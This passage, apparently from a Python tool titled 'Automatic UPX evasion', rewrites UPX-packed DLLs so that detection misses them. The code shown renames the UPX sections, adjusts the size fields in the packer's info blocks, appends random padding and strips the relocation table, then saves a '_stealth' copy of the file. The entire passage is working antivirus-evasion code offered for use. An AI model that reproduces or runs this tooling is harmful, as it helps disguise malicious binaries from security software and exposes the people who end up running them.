new_name = replacements[sec_name]
old_name = sec_name.decode(errors='ignore')
print(f"[+] Section '{old_name}''{new_name.split(b'\x00')[0].decode()}'")
data[sec_offset:sec_offset + 8] = new_name
modified = True
if not modified:
print("[i] No UPX sections found maybe already renamed")
return data, modified
def tweak_upx_info_blocks(data: bytearray) -> bytearray:
for pos in range(len(data)-0x2000, 0x400, -4):
block = data[pos:pos+12]
if len(block) != 12 or block[0] >= 10:
continue
sz_packed = int.from_bytes(block[4:8], 'little')
sz_unpacked = int.from_bytes(block[8:12], 'little')
if 1000 < sz_packed < 50_000_000 and 1000 < sz_unpacked < 100_000_000:
tweak = random.randint(1, 7)
data[pos+4:pos+8] = (sz_packed + tweak).to_bytes(4, 'little')
data[pos+8:pos+12] = (sz_unpacked - tweak).to_bytes(4, 'little')
print(f"[+] Tweaked info block: packed +{tweak}, unpacked -{tweak}")
return data
print("[i] No info block tweaked")
return data
def add_padding(data: bytearray) -> bytearray:
import random
kb = random.randint(3, 15)
padding = bytearray(random.getrandbits(8) for _ in range(kb * 1024))
data.extend(padding)
print(f"[+] Added {kb} KB random overlay padding")
return data
def strip_relocations(data: bytearray) -> bytearray:
pe_offset = int.from_bytes(data[0x3C:0x40], 'little')
reloc_rva = int.from_bytes(data[pe_offset + 160:pe_offset + 164], 'little')
if reloc_rva != 0:
data[pe_offset + 160:pe_offset + 168] = b'\x00' * 8
print("[+] Stripped relocation table")
else:
print("[i] No relocations to strip")
return data
def main():
parser = argparse.ArgumentParser(description="Automatic UPX evasion")
parser.add_argument("input", help="UPX-packed DLL")
parser.add_argument("-o", "--output", help="Output filename")
parser.add_argument("--keep-relocs", action="store_true", help="Don't strip relocations")
args = parser.parse_args()
in_file = Path(args.input)
if not in_file.exists():
print(f"[-] File not found: {in_file}")
return
out_file = Path(args.output or f"{in_file.stem}_stealth{in_file.suffix}")
print(f"[*] Loading {in_file} ({in_file.stat().st_size // 1024} KB)")
data = bytearray(in_file.read_bytes())
print("[+] Applying evasion...")
data = modify_upx_magic(data)
data, _ = rename_upx_sections(data)
# data = tweak_upx_info_blocks(data)
data = add_padding(data)
if not args.keep_relocs:
data = strip_relocations(data)
out_file.write_bytes(data)
print(f"[+] Saved → {out_file} ({len(data)//1024} KB)")
if __name__ == "__main__":
main()